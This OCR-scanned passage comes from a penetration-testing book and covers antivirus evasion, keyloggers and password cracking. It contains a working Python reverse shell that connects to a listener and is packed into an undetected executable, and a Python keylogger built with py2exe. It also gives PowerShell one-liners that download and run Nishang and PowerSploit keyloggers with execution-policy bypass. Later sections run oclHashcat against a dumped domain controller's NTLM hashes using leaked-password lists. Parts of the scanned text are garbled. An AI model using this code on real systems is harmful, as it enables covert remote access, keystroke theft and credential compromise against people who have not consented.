List logon sessions and NTLM credentials (default). 
Changes NTLM credentials of current logon session. 
Parameters: <UserName>:<DomainName>:<LMHash>:<NTHash>. 
Lists logon sessions and NTLM credentials indefinitely. 
Refreshes every 5 seconds if new sessions are found. 
Optional: -rcrefresh interval). 


When running the obfuscated wce.exe file through VirusTotal, we find that it doesn’t get picked up 
many of the common corporate AV solutions. 


SHA256 


6f95t>l434981 f99223«cdd6O9d07208cf2278a979327Q8050d22ba57$f1al0af 


* 

*o i 


FBe name: cJoaked.exe 

DelactJon ratio: 17/57 

Analyse date: 2015-03-21 23:19:38 UTC (1 minute ago) 


91 Analysis Q. File detail O Adcttional information # Comments C Votes H Behavioural information 

Antivirus Result Update 

Zoner © 20150320 

Zliya © 20150321 

Vi Robot © 20150321 

VIPflE © 20150321 

VBA32 Mai««are-Cryptor Qenerai 3 20150321 

TrendM»cro-HouseCai © 20150321 

Trend Micro © 20150321 

Tola! Defense © 20150321 

TTieHacker G 20150321 

Tencent Trofen Win32 Oudameh Gen 2 20150322 

Symantec O 20150321 

SUPERAntaSpyware © 20150321 

Sophoe G 20150321 

Virus Total Results 


Remember, this is really beta code, but I wanted to demonstrate how you can write your own 
obfuscators. 


Python 


Python is your best friend. I use Python to create most of my exploits and tools. There are several 
reasons why Python works so well. First, it is common to see systems which white-list applications 
that allow python files. Second, you can very easily add randomness to get around any signature. And 
third, using something like py2exe you can turn the file into a self-running executable. 


Python Shell 

Watching Dave Kennedy's talk at BSides in 2012(45}, took me down the track of using Python to 
create malicious payloads. The simplest example of this was creating a python shell and wrapping it 
up withpy2exe. 

• #!/usr/bin/python 
import socket, subprocess 
HOST = '192.168.10.100' 

PORT = 5151 

s = socket.socket(socket.AF_INET, socket.SOCK STREAM) 
s.connect((HOST, PORT)) 
s.send('[*] Connection Established!') 
while 1: 




data = s.recv(1024) 
if data == 'quit': break 

proc = subprocess.Popen( data, shell=True, stdout=subprocess.PIPE, 

stderr=subprocess.PIPE, stdin=subprocess.PIPE) 

stdoutvalue = proc.stdout.read() + proc.stderr.read() 
s. send( stdoutvalue) 

s.close() 

When this code executes, it will create a shell connection back to 192.168.10.100, where I will have 
netcat listening on port 5151. This reverse shell will give me command line access into the host. 
Using pyinstaller, we can convert the python file into an executable: 

• C:\python27\python.exe C:\utils\pyinstaller-2.0\pyinstaller.py — out=C:\shell\ — 
noconsole —onefile C:\shell\shell.py 

Again, if you try to scan this file with AV, it won't be picked up. 


Python Kevlogger 

Everyone uses different types of keyloggers and this is no different. My goal was to develop 
something that would most likely be accepted on white-listed application lists and be able to run 
undetected by AV Included below is simple code to have python start recording all keyboard 
presses: {46} 

• import pyHook, pythoncom, sys, logging 
filelog = 'C:\\systemlog.txt' 
def OnKeyboardEvent(event): 

logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s') 
chr(event.Ascii) 

logging.log(10, chr(event.Ascii)) 
return True 

hooksmanager = pyHook.HookManager() 
hooksmanager.KeyDown = OnKeyboardEvent 
hooks_manager.HookKeyboard() 
pythoncomPumpMessagesQ 


Here is my setup.py file: 

• from distutils. core 
import setup 
import py2exe 

setup(options = {'py2exe': {'bundle files': 1, 'compressed': True}}, 
windows = [{'script': "logger.py"}], 
zipfile = None, 

) 

And using py2exe, I will convert the python script to an executable with the following commands: 

• python.exe setup.py install 



• python.exe setup.py py2exe 

Now I will have an executable binary of the keylogger that records all keystrokes and stores all of the 
key strokes to C:\systemlog.txt. Pretty simple and easy and AV never detected it. If you need to, you 
may add some randomness in there to make sure that it isn't picked up by signatures or hash matching. 


Other Keyloggers 


Being able to drop an undetectable keylogger can make a huge difference in situations where you 
can’t pull passwords from memory or look for web-based passwords. I will show you two different 
examples that can be executed from a command line. 

Keylogger Using Nishang 

f https:// github.com/ samratashok/ ni shang ) : 

Nishang is a collection of PowerShell scripts used for pre/post exploitation. One of the scripts is 
called keylogger.ps 1. As I keep reiterating throughout the book, and as you will notice in different 
penetration tests, nothing ever works perfectly. You will need to know different ways to execute 
commands and understand that different environments may or may not allow you to do certain things. 
In this case, we assume that we have a shell on the system. We are going to use bitsadmin, which is 
used by Microsoft Windows to download updates, to download our keylogger and put it in the public 
folder. We will then go to the public folder and execute the keylogger. The keylogger has many other 
functions, such as pushing the logs to Twitter, so I recommend you read through it before executing 
anything. 

• cmd.exe /c "bitsadmin /transfer myjob /download /priority high 
https ://raw .githubusercontent.com/ cheetz/ nishang master/Gather/Keylogger .ps 1 
c:\Users\Public\Keylogger.ps 1" 

• cd \users\public\ 

• powershell.exe -NoP -W Hidden -exec bypass -noexit -Command 
".\Keylogger.ps 1 http://127.0.0.1 stopthis" 

The output will be located at: 

• C:\Users\fAccountJ\AppData\Local\Temp\key.log 

Note that when looking at the file, it is obfuscated and needs to be converted. Once you move this file 
onto your box, convert the logs using the PowerShell script located here: 

https: //raw. githubusercontent.com/ cheetz/nishang/ master/Utility/ParseKevs .ps 1 . 

Here is the command to convert the logs: 

• powershell.exe -exec bypass -Command "& {Import-Module .\Parse_Keys.ps 1; 
Parse Keys key.log output.log}" 




And your decoded keylog output file is written to output.log. 


Keylogger Using Powersploit 

t https://gi thub.com/mattifestation/PowerSploit k 


The other keylogger with which I have had some success is the Get-Keystrokes PowerShell script. 
Similar to running the Nishang script, this can be executed by the following command: 

• powershell.exe -exec bypass IEX "(New-Object 

Net.WebClient).DownloadString('https://raw.github.com/cheetz/PowerSploit/master/E 
Keystrokes.psl');Get-Keystrokes -LogPath C:\Users\Public\key.log" 


Conclusion 


There are many different techniques to evade AV. Although this is not a complete list, this should give 
you a good overview on where to start if you are battling anti-virus. The last thing you want is for AV 
to stop you from popping a box that you can potentially exploit. 


Penetration testing is all about trying out different tools, techniques, and tactics to find what works in 
that particular environment. Remember not to submit your executable to a repository like Virus Total, 
as the lifespan of your executable might shrink dramatically. 



Special Teams - Cracking, Exploits, And Tricks 


This section focuses on all other methods that can assist in penetration testing, but do not fit in the 
other sections. I will discuss some of the tips and tricks I have for cracking password hashes, 
searching for vulnerabilities, and some short cuts. 


Password Cracking 


There are many different tools to use with password cracking, however, I am going to focus mainly on 
two tools that I use. These two tools are John the Ripper (JtR) and oclHashcat. These are both 
excellent tools for cracking passwords. 

Before I can start talking about different password crackers, it is important to make sure you 
understand the basic definitions. The three configurations you should generally make for an efficient 
password cracking process are to define wordlists, rules, and hashing algorithms. 


Wordlists: This is exactly what it sounds like-they are files that contain password lists in cleartext. 
The password cracker software will try to hash each one of these passwords and see if they match the 
hash that you are trying to crack. 


I generally like to take wordlists from prior password compromises and incorporate them with the 
type of organization you are dealing with. For example, if you are cracking NTLM hashes from a 
domain controller, make sure you understand what their password policy is. There is no point trying 
four or five-letter passwords if they require a minimum of eight characters. 


Here are some of my favorite wordlists: 

List Name: RockYou 

Details: Compromised in 2009 from a social game and advertising website. This is a great list to start 
with as it isn't too large and contains a lot of the common passwords with a decent success rate. 
Download Link: 

http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2 

List Name: Crackstation-human-only 

Details: Real human passwords leaked from various website databases. There are about 64 million 
passwords in this list. GZIP-compressed. 247 MiB compressed. 684 MiB uncompressed. 


Download Link: 

https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm 




List Name: Crackstation-Full 

Details: Full crackstation passwords leaked from various website databases. Extremely large. GZIP- 
compressed (level 9). 4.2 GiB compressed. 15 GiB uncompressed. 

Download Link: 

https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm 


List Name: m3g9trOn_Passwords_WordList_CLEANED: 

t http://blog.thireus.com/cracking-story-how-i-cracked-over-122-million-shal-and-md5-hashed- 

passwords ^ 

Details: List of 122 million passwords 


Download Link: 
http://bit.lv/KrTcHF 


List Name: Ten Million Passwords 

Details: A researcher Mark Burnett combined all the recent password dumps and compiled a list of 
the top ten million passwords. 


Download Link: 

https://xato.net/passwords/ten-million-passwords/ 

• Torrent File: magnet:? 

xt=urn:btih:32E50D9656E101F54120ADA3CE73F7A65EC9D5CB&dn=10-million- 
combos.zip&tr=udp%3a%2f%2ftracker.leechers- 

paradise.org%3a6969&tr=udp%3a%2P/o2ftracker.coppersurfer.tk%3a6969%2fannoui 
paradise.org%3a6969%2fannounce&tr=http%3a%2f%2fbt.careland.comcn%3a6969 0 / 

• To create a unique list of just passwords: 

• unzip 10-million-combos.zip 

• cut -f2 10-million-combos.txt | sort-u> 10-million-unique.txt 


List Name: Wick2o’s Password List from Dump Monitor 
Details: Wick2o monitors leaks on pastebin and similar sites. 

Download: git clone https://github.com/wick2o/Dump-Monitor-WordLists.git /opt/Dump-Monitor- 
WordLists 

Other places to get passwords or password lists: 

• https://github.com/danielmiessler/SecLists/tree/master/Passwords 

• https://archive.org/details/pastebinpastes 

• https://wiki.skullsecurity.org/Passwords 

• http://www.leakedin.com/tag/emailpassword-dump/ 











• https://www.reddit.coni/domaiD/pastie.org/search? 
q=password+leak&sort=relevance&t=month 

• Scraping all pastebin/pastie/... sites 


Rules: Rules define if any modifications need be injected into the wordlist. The best way to describe 
rules is by an easy-to-follow example. We can take and use the KoreLogicRulesAppendYears 
f http://contest-2010.korelogic.com/rules.htmf ) set of rules, which look like the following: 


• cAz"19[0-9][0-9]" 

• Az"19[0-9][0-9]" 

• cAz"20[01][0-9]" 

• Az"20[01][0-9]" 


It will append the years from 1949 to 2019 in each and every password. If the password list 
contained the word "hacker", it would try to crack the hash for the string hacker 1949 all the way to 
hacker2019. Remember, the more complex rules you have, the more time it will take to finish going 
through all the different words in the word list. 

Hash Algorithms: A hashing algorithm is used to generate the password hash. These are very 
important because if you select the wrong algorithm, it will either fail to run or fail to crack. For 
example, if we select the MD5 algorithm for SHA1 hashes, the cracking tools will not find any hashes 
to crack and will exit immediately. 


Now that we have basic understanding of different cracking configurations, let's compare John the 
Ripper versus oclHashcat. 


John The Ripper 

f http://www.openwall.com/johnA (Windows/Kali Linux/OS X)i 


I used to regularly use John the Ripper (JtR) but moved away from it a while ago due to the GPU 
support from oclHashcat. However, JtR Jumbo does have CUDA and OpenCL support now. Here is a 
list of JtR hash formats to help you identify which type of password you are cracking: 
http: //pentestmonkey.net/ cheat- sheet/j ohn-the-ripper-hash- formats. 


Cracking M 1)5 Hashes 

Let's say you are able to compromise a *nix system or maybe a database full of password hashes. You 
will most likely run into MD5 or SHA hashes, but for the following example, we will assume that 
they are non-salted MD5 hashes. If you are looking to crack standard MD5 hashes, the basic 
command is: 


• john -format=raw-md5 -pot=./list.pot md51ist.txt 







This will tell john the ripper to look in the md51ist.txt file for MD5 hashes and write any cracked 
passwords into the file list.pot. 


root@kali:~# john —format=raw-md5 —pot=./list.pot md51ist.txt 

Loaded 3 password hashes with no different salts (Raw MD5 [128/128 SSE2]) 

test (test) 

password (user) 

woot (hacker) 

guesses: 3 time: 0:00:00:01 DONE (SunDec 29 18:32:12 2013) 

If you are using the JtR Jumbo pack and want to take advantage of GPU processing: 

• john —format=raw-md5-opencl —wordlist=./Wordlists/all.lst —rules: Single 
md51ist.txt 


Here are additional sources on using JtR: http://blog.thireus.com/cracking-story-how-i-cracked-over- 
122-million-shal-and-md5-hashed-passwords. 


OclHashcat 

f http://hashcat.nct/oclhashcat/ ¥ Windows/Kali Linux): 


Honestly, this is the tool I use most when password cracking. As we all know, graphic processing 
units (GPUs) are great for cracking passwords as they utilize many different cores in parallel. The 
advantages of using GPUs vs. CPUs are very significant and this can be demonstrated with the use of 
oclHashcat. 

In the following examples, I am going to go over cracking WPAv2 and NTLMv2. These are the most 
common hash types I run into and they are typically the groundwork for any other types of hashes. If 
you want to see all the different hash types that oclHashcat will support, visit their website at 
http://hashcat.net/oclhashcat/ . 

Cracking WPAv2 

In the beginning of the book, I discussed how to capture the WPAv2 handshake, which is required for 
password cracking. The output from the capture was a .hccap file. This is the file format that 
oclHashcat supports for brute forcing WPA-hashed passwords. 


In the following examples, I am going to utilize oclHashcat on my Windows host using a GeForce 
GTX 680. Generally, I prefer using the ATI Radeon cards, but for this example, it won't make much 
of a difference. To kick off the password cracking, I will use the command: 

• cudaHashcat-plus64.exe -m2500 out.hccap list\rockyou.txt 





G:\oclHasheat-plus-0,14)eudaHasheat-'plu864.sxe -» 2SMH out.hceap list 1 
cudanashcd'.-jiitis uH.14 Up atom starting... 

Hashes: 1 total, 1 unique salts, 1 unique digests 
Bitnaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes 
Rules: 1 

Jorklnati: 16 loops, 8 accel 
Jatchdog: Ienperature abort trigger set to 80c 
Watchdog: Ienperature retain trigger set to 80c 
Device Hi: GeForce CTX bW. 284BHB, lBSBflha, GHCU 
Device Hi: Kernel ./kernels/43lB/n25B0.snJ0.64.ptx 

'ache-hit dictionary stats list\roc]<you.txt: 13882149? hytes, 1410004 

[sltatus [plause Erlesune (b)ypaes (q)uit ■> „ 


oclHashcat Example 


This is a very straightforward example, which says to crack WPAv2 hashes against the out.hccap file 
and use the password list from rockyou.txt. 


Cracking NTLMv2 

If you have compromised a Windows Host or maybe a Domain Controller, you will have to crack 
NTLM hashes. You can always try to crack the LM hashes, but they are becoming more and more 
difficult to find, so we will stick with the NTLM hashes. 


In the following example, we are taking a list of NTLM hashes and using the rockyou password list. 






C=MtclHashcat-plus-l.l5kudftHftskat-plusM.exe -i 1000 NTLH.txt Iist\rockyou.txt 
eudaHAskat-plus U0.15 by Atm starting,,. 

Hashes: 3 total, 1 unique salts, 3 unique digests 

Hltnaps: 8 hits, 256 entries, 0*00H00BfF nask f 1124 bytes 

Rulis: 1 

Workload: 512 loops, 80 steel 
Watchdog: Tamperaturfl abort trigger 5«t to 9fa 
Watchdog: Temperature retain trigger set to 80c 
Device Si: GeForce GIK 680, 20«flB, 105BMhz, 8BC1I 
Device (1: Kernel f /kernels/43i8/Bl0M_a0isnJ0i4,ptx 
Devito 81: Kernel ./kernels/43i8/)ji:cro.&4.ptx 

Cache-hit dictionary stats listSrockyou.txti 139921497 bytes, 14343296 words, 1* 


9745cdb3?e9ce e f 7a5 hftfl 3 a 3 f 4c77d71 ipasi wnrd t 
bli7525b345470c29ca3d8ac0b556baB«hackcrt 


Started: Bon Sec 09 09 i41:45 2013 
Stopped: Hon bet 09 09*41:50 2013 


oclHashcat NTLM 


From the example above, there were three unique passwords, but oclHashcat was only able to crack 
two of the three passwords. To increase our chances, I am going to add the passwordspro rule set to 
assist with the rockyou password list. If you want to get a little deeper into understanding these rules, 
try starting at the oclHashcat page: 

http://hashcat.net/wiki/doku.php?id=rule_based_attack . 




!Mi IHukit-p!*l.iSMUiikitrikM.iii -i Mi NlJJl.tKt -f Hiln\|itii|Mrdipm.rula 

iidiHuhcttilu vlil! bj llm cUrling... 

Mini 13 Mil. 1 Pi|«t tilti. 3 unlp Mgttti 

iiu^: 1 bit). 25b iitriMi ««»(' 4 lH 


imp: t ft. 25b iMrin, UMf u 

Lilli! JH] 

irkliii! 512 lotpi, il tutl 
itchdi]! Imperttun abort trigir i«t to 



oclHashcat with Rules 


Using the rules didn't actually find the password for the third hash. In larger password hash lists, this 
would have definitely found more passwords, but was only able to find two out of the three 
passwords in this scenario. 


To increase our chances even more, I will try a much larger password list. This, of course, increases 
the amount of time needed to run this job. However, if it resolves a password, it will be worth it. The 
command to use is: 

• cudaHashcat-plus64.exe -m 1000 NTLM.txt list\realhuman.txt -r 
rules\passwordspro.rule 







C; At-ylut-H. 1 JtuiirtH*ik 1 it-p lyiM. f ib -* \m NttJl.lKt nhi^mmwt^ 

ciiJaHftakftt-jiiuL ulS.!!* bji stcii itiMing.., 


lidElwi! 3 GdIaL 1 imiqufl a a It i. 3 uniguo dim 

HUM? mh 


its 

m tyitf 


BUiftpi: fl blti. J5G Antrim. fa 
hltfi 3141 
yfufkkad; &12 kt>ps r SI util 
UdicMug- IEnp^e-dtuiMJ Abort trigger- ait tn tfk 
l/dkMuj- I'BnwirAtuH retain trigyer set to flic 

PqvIh li: Mtm m m. aim mm, hhcu 

hviu lit Kintl ,AmibHitlMWjfl.iiiJl.i4.|tx 

Dflfilcii lit KtHHil ./kri-iitli/IJlS/bs'iM.fii.iitK 


Cftck'lilt; dlctkoary ititE llsC^Hrihuiwn.tJit: 71(441117 bytfli F (I 7 (fl( 5 S tfordi. 2 $t 2 ? 734 ‘j ]55 kopput 


lulu Hi 


Snstifln.fantjj*! ru^lUshcut pliii 

ElditiU.........] Running 

RmIm.IjTO* .: Fill (hiltt^HtMlritpN.nilt) 

Inp^t+hHrii^i Pi 1# Olit^MilhwwMrt) 

HishJdj'fjetnjJ Pile ChTLH.txt> 

Haih.TypHTU1 

TiPH.Slflrt«d., r : Hon Dec: If IMJiH Zll3 (11 itt*> 

non D*t m hm?;3i W 0 iin, H mi) 
Gpid.fiPU.lt ^SJri/i 
RflCQUored.^.^: 2/3 (£6.47n> Dlgfitij fl/1 (I.Kb) Eilti 
FmgHsitt104€167?230y280297345355 (5<flO 

ftjitM.■ tmwmwmw <mik) 

NWin T W) v fi^.i m UtiL Kt lisp, iSffrpn to 


! ? 4 fri 2 diBW 5 c alia f M( fc ji ,371 jink £> ; Ifiupe rfe c Mt_j 


oclHashcat with Different Password List 


As you can see from the results, the new password list and rule set recovered the third password. Just 
by playing around with different password lists and rule sets, you can quickly find out what works 
and what just takes too long to run. This is all based on what types of GPUs you have, how long the 
password lists are, and the complexity of your rule set. 

Whether you want to crack MD5 hashes, MS SQL hashes, SHA1 hashes, or others, this same query 
can be run by changing the "-m" parameter. For a full listing of hashes that oclHashcat accepts and 
cracks, go to: 

https: //hashc at. net/ wiki/doku.php ?id=exampl ehashes . 


Cracking in Real Life 

You were able to successfully dump the Domain Controller. The next step is to see what you are able 
to recover. Historically there were Rainbow tables, but with minimum length restrictions, size and 
time became a huge issue. Trying to create Rainbow tables for 10+ characters becomes so expensive 
that it isn’t really usable on a penetration test (unless you find LM hashes). 














oclHashcat is the fastest password recovery tool that I have ever dealt with. I have used John the 
Ripper and other tools, but due to the use of GPUs, rules, pre-processing, and password lists, I 
generally turn to oclHashcat as my go-to password-cracking tool. This chapter will talk about how to 
effectively use oclHashcat in a pentest and will mostly focus on cracking NTLM hashes; however, 
you can use these examples with any hashes. 

My password cracking rig was presented in the Pre-Game phase and with a little bit of money, you 
can be running your own password cracking monster. 

So, you were able to extract the SUCK Domain Controller hashes. The next step is to be able to see 
what you can recover from those hashes. In our example, we are using a password dump similar to 
what I have seen in the field. Our compromised DC has a list of over 21,000 hashes. We could first 
start by straight brute forcing through all the characters, but is this really feasible? Let’s see by 
running the command: 

• oclHashcat64.exe -m 1000 hashes\hashes.lst -a 3 ?a?a?a?a?a?a?a?a —force 


Command Breakdown: 

• oclHashcat Executable: oclHashcat64.exe 

• -m 1000: The hashes we are supplying are in the format of NTLM 

• hashes\hashes.list: Stored location of the Domain Controller Hashes 

• -a 3: using brute-force Attack mode (using a mask below) 

• ?a?a?a?a?a?a?a?a: 8 combination of letters, numbers and special (upper/lower 
case) characters 

This definitely isn’t the most efficient way to crack hashes, but it can really cover those odd 
passwords like Jdkl!3vG that might not be in a password list. Masks will be very important to learn, 
so if you haven’t dealt with them before, make sure to check out oclHashcat’s site: 

https://hashcat.netAvikf/doku.php?id=mask_attack . 


Remember that we are going for speed and efficiency on a test, so let’s see what results the brute- 
force attack will provide: 



Session.Name,*,: oclHashcat 
StatusAborted 

Input.node .....: flask <7a?a?a?a?a?a?a?a) [81 
Hash.Target....: File <hashes\hashes.1st> 

Hash.Typ*_: NTLM 

Tine.Started.*.: Sun Jan 18 16:43:57 2015 <14 secs) 

T im. Estimated,: Thu Jan 22 17 = 37:23 2015 <4 days, 0 hours) 

Speed.GPU.ttl.*.: 9557,0 MH/s 

Speed.GPU.82...: 10268.8 MH/s 
Speed.GPU.8*...: 19825.8 MH/s 

Recovered.....*: 0/21318 <0.00/> Digests, 0/1 (0.00/) Salts 

Progress.*...*.: 267556585472/6634204312890625 <0.00/) 
Skipped......*.: 0/267556585472 <0.00z> 

Rejected0/267556585472 <0.00/> 

H UHon.GPU. 81...: 42/ Util, 45c Temp, N/A Fan 

Ht/Mon . GPU .82_: 0/ Util, 44c Temp, N/A Pan 


Started: Sun Jan 18 16:43:57 2015 
Stopped: Sun Jan 18 16:44:12 2015 

C:\Users\gheetz\Dounload5\ocIHashcat - !*32>oclHasheut64.exe -m 1000 
has he s Sluts he s .1st -a 3 ?a?a?a?a?a?a?a?a —force 


oclHashcat Brute-Force 


We can already see that this is going to take four days to go through all eight characters. We could use 
smarter masks based on human tendencies. We know that if there are password requirements, such as 
upper/lower/special character, most people put the capital letter in the front, the special character at 
the end. We could create these custom masks to better improve efficiency, but this will still take a fair 
amount of time. 


For efficiency sake, the next best step is to start testing large password hashes. We are going to focus 
on using two different password lists: Crackstation and m3g9tr0n_Passwords. It is important for you 
to find out which password lists work well in various industries. Let’s start with the Crackstation list, 
which contains roughly 64 million passwords: 

• oclHashcat64.exe -m 1000 hashes\hashes.lst lists\crackstation_realhuman_phill.txt - 
-force 


The results below on the left show that in six seconds, we were able to test all the hashes against the 
password list. Using the Radeon R9 295x2, we are able to get some great speed against these lists. 
Unfortunately, the results from these hashes are pretty low with 780 or about 3.66% passwords 
recovered. 


The next step is to run the hashes against rules. Luckily, oclHashcat has provided a list of great rules 
to run. They are located inside the oclHashcat directory, in the rules folder. I recommend going 












through each of them and understanding what the differences are between the rules. In the next 
example, we are going to use the same password list and, this time, incorporate a great rule set: 

• oclHashcat64.exe -m 1000 hashes\hashes.lst lists\crackstation_realhuman_phill.txt - 
r rnles Ylns i dePro-PasswordsPro.rnl e —force 


|9 bb04 d0da d b10486 3 a8 01ddafbd5339b:Zxcu bnn4 
93b2e2a6bdc90617360240364bl07a8 = Zxco1234 
J2I852686 c46eId38dacdac8cbba!9b9 -Zxc v bnm8 


Session.Name 

Status. 

1nput .Node-. 
lash.Target . 
lash.Type... 
Time.Started 
Time.Estimated 
Speed.GPU.01 
Speed.GPU.tt2 
Speed.GPU.fl* 
Recovered... 
Progress .... 
Skipped,.... 
Rejected.,.. 
fWMon.GPU.81 
IWMon.GPU.tt2 


oc 1H as he at 
Exhausted 

File (lista\crackstat realhunan phill.txt> 
File £hashes\hashes.1st> 

NTLh 

Sat Jan 17 13:50:34 2015 <6 secs) 

0 secs 
6633.4 kH/s 
5089*6 kH/s 
11723.0 kH/s 

780/2131B <3.66x> Digests, 0/1 <0,00x> Salts 
63768655/63768655 <100.00/> 

0/63768655 <0.00*> 

616398/63768655 <0.97*> 

815* util, 37c Temp, N/A Fan 
05* Util, 37c Temp, N/A Fan 


Started: Sat Jan 17 13:50:34 2015 
Stopped: Sat Jan 17 13”50*4H b 


oclHashcat - Wordlist Cracking 


















19 bb04 d0da dbl0486 3 a8 01ddafbd5 3 3 9 b:Zxc v bnn4 
93b2e2a6bdc90617360240364bl07a8:Zxcul234 
)2l852686c46eld38dacdac8cbbal9b9 =Zxcvbnn8 


Session.Name. 
Status ..■.. m . 

In put.Mode_.. 
lash.Target.. 
lash.Type.... 

time.Started. 
Time.Estimated 
Speed.GPU .ttl. 
Speed.GPU,82 • 
Speed. GPU. #». 
Necouered.... 

Progress ..... 

Skipped...... 

Rejected..... 

UJMon.GPU.81. 
UJMon.GPU.82. 


oelHashc at 
Exhausted 

File (listB\ci*ackstat real Hunan phill.txt> 
File Chashcs\hashes.1st) 

NTLN 

Sat Jan 17 13:50:34 2015 <6 secs) 

0 secs 
6633.4 kH/s 
5089.6 kH/s 
11723.0 kH/s 

780/2131B C3.66x> Digests, 0/1 <0.00x> Salts 
63768655/63768655 <100.00x> 

0/63768655 <0.B0K) 

616398/63768655 <0.97:0 
81/ Util, 37c Temp, N/A Fan 
0/ Util, 37c Temp, N/A Fan 


Started' Sat Jan 17 13:50*34 2015 
Stopped: Sat Jan 17 13:50:45 2015 


oclHashcat - Wordlist Cracking 


In the image above on the right, by the using rules, we are processing about 7 million hashes a second, 
which took about 40 seconds. Still well within our time limit, we have now cracked 38% or 8180 
hashes. This is now looking positive. Let’s throw another password list at it this time. From the prep 
stages, we should have the eNtrOpY ALL sort uniq.dic that we can use: 

• oclHashcat64.exe -m 1000 hashes\hashes.lst lists\eNtrOpY_ALL_sort_uniq.dic -r 
rul es YIns i dePro-PasswordsPro.ml e —force 
















lb8ec55?039?e6?bdl928a9792811870:Xenogears85 
)89c0c2bce8a865hl92ca71521bl35c8:Yosemite8 
"9c2129e35cbeb2f460030b583299f34:Yours 1968 
)0a50520422a09d8989bl2610cafe683:UrigleY3 


Jess ion.Nane...: oclHashcat 

Status.: Exhausted 

lules.Type.: File <rules\InsidePro-PasswordsPro.rule> 

Input.Jlode.: File <lists\eNtr0pY_ftLL_sort_uniq.dic) 

lash.Target_: File (hashesShashes.lst) 

Sash.Type.: NTLH 

Tine.Started...: Sat Jan 17 13:58:05 2015 <32 secs) 

fine.Estimated.: 0 secs 

Speed.GPU.#1...: 6302.1 HH/s 

Speed.GPU.#2...: 3026.6 HH/s 

Speed.GPU.#»...: 9328.7 HH/s 

lecovered.: 10733/21318 <50.35z> Digests, 0/1 <0.00/> Salts 

Progress.: 262755863370/262755863370 (100.00X) 

Skipped.: 0/262755863370 <0.00z> 

Rejected.: 0/262755863370 <0.00x> 

H/non.GPU.81...: 53/ Util, 45c Temp, N/ft Fan 
HJnon.GPU.82...: 0/ Util, 45c Temp. N/fl Fan 


Started: Sat Jan 17 13:58:05 2015 
Stopped: Sat Jan 17 13:58:40 2015 

3:\Uscrs\cheetz\DownloadsSoclHashcat-1.32>oclMashcat64.exe n 1000 hashes 


oclHashcat - Adding Rules 


This took about the same amount of time for 122 million passwords, but we were able to go from 
38% up to 50% of recovered hashes in under a few minutes total. 


We can keep playing around with additional rules and make small gains, but at some point the rules 
will stop making a difference. We need to find new words to add to our password list. 


• oclHashcat64.exe -m 1000 hashes\hashes.lst lists\eNtrOpY_ALL_sort_uniq.dic -r 
rulesMnsidePro-HashManager.rule -force 











dd87bl4ccdbl9b5ee0Bdd09bca72dd0:7¥oubastard5 
elc9204e55f748063fe65ec0iS5ieee :yvonne8$l 


• ■ s * * * 


Session.Name 

Status.._ 

[Rules.Type,. 
Ilnput.Hode 
Hash.Target.*.. 

Hash.Type. 

Tine.Started... 
[T ine .Est inated, 
Spted.GPU.Hi... 
Speed.GPU.#2... 
Speed. GPU. It*... 
Recovered..,... 

Progress. 

Shipped........ 

Rejected... 

HUHon.GFU.fi... 

HUHon.GFU.f2... 


oclHashcat 

Exhausted 

File CrulesMnsidePro-HashManager.rule) 

File (li*ts^eNtr0p¥JLL_sort_uniq.dic> 

File (hashesshashes.lst) 

NTLI1 

Sat Jan 17 14:04:38 2015 <50 secs) 

0 secs 

5047.7 (i/s 
485.0 HH/s 

5533.7 HH/s 

11582/21318 (54.80K) Digests, 0/1 (0.00/> Salts 
53B47BB3H99/53947B03M90 <100,00/) 
0/538478030090 (0.00/) 

0/538478030090 <0.00/) 

70/ Util, 51c Temp, N/A Fan 
0/ Util. 52c Tenp, N/A Fan 


Started: Sat Jan 17 14:04:38 2015 
Stopped: Sat Jan 17 14:05:29 2015 


fc:\UsersNcheetz\D0vmload3\oclHashcat^l.32)oclHashcat64.exe 1000 ha 


oclHashcat - Additional Password Lists 


Back in the prep stages, we created some custom password lists using two tools, Wolfhound (for 
words from Twitter/Reddit/Websites) and the custom webscraping tool. Let’s take those lists and run 
some additional cracks against them: 

• oclHashcat64.exe -m 1000 hashes\hashes.lst lists\10k_and_scraped_passwords.txt - 
r rulesfrnsidePro-PasswordsPro.rule —force 






























We now are at 55% of passwords cracked, but still have a long way to go. 


Prince: 

Prince is a password guess generator and can be thought of as an advanced Combinator attack. Rather 
than taking input from two different dictionaries and outputting all the possible two-word 
combinations, Prince only has one input dictionary and builds "chains" of combined words 

f http://reusablesec.blogspot.com/2014/12/tool-deep-dive-prince.htmD . Prince was introduced in late 
2014 to advance the attacks on password guessing. As more and more people started using complex 
passwords, following the example set by this xkcd comic strip, http://xkcd.com/936/ . it became 
harder to password guess. 

What Prince does is take a password list and generates all the different combinations it can. If you 
have a list with: 

• a 

• cat 

• house 


It will build a list of passwords: 

• acat 

• ahouse 

• acathouse 

• ahousecat 

• cata 

• cathouse 

• catahouse 

• cathousea 

• ... and so on. 

Using this technique, we can take some of our favorite password lists and generate great password 
combination lists. We will start with a small list of passwords, add our custom words and start 
building from there. In this case, I used the following password list, which had a good number of 
basic passwords: 

• https ://raw. githubusercontent.com/ discourse/discourse/master/lib/commonpasswor 

common-passwords.txt 

Next, I added the words scraped from the Bloodhound and Webscraper examples. In total, I have 
about 15,000 words to create these different password lists. For example: 

• princeprocessor-0.19\pp64.exe — pw-min=9 —pw-max=10 -o pp.txt < 
lists\10k_and_scraped_passwords.txt 







Command Breakdown: 

• princeprocessor Executable: pp64.exe 

• —pw-min=9: Minimum password length of 9 characters 

• — pw-mm=10: Minimum password length of 10 characters 

• -o pp.txt: Output to a file called pp.txt 

• < lists\10k_and_scraped_passwords.txt: List of 10k wordlist and scraped words 

• *One additional optional flag is to use —elem-cnt-max=NUM. This defines how 
many words can be put together to make a chain. 

The output of pp.txt is about 272 MB. If we take a look at the files, we see the combined wordlists. 


□r 


C:\Users\cheetz\Downloads\oclHashcat-1.32\pp.txt - Notepad + + 


File Edit Search View Encoding Language Settings Mac 

EJ pp txt □ 


14163328 


1416332 9 


14163330 

beastltaco 

14163331 


14163332 


14163333 


14163334 

oscarltaco 

14163335 


14163336 


14163337 

7 A - — V r 7 r 

14163338 

7 * y y • - y y y 7 t. 


Prince - Password Generator 


As we see from the pp.txt file above, there are words that we would never have had in our original 
password list. What if we create a file with passwords sized between 10-12 characters? 

• princeprocessor-0.19\pp64.exe —pw-min=10 —pw-max=12 -o ppl0_12.txt < 
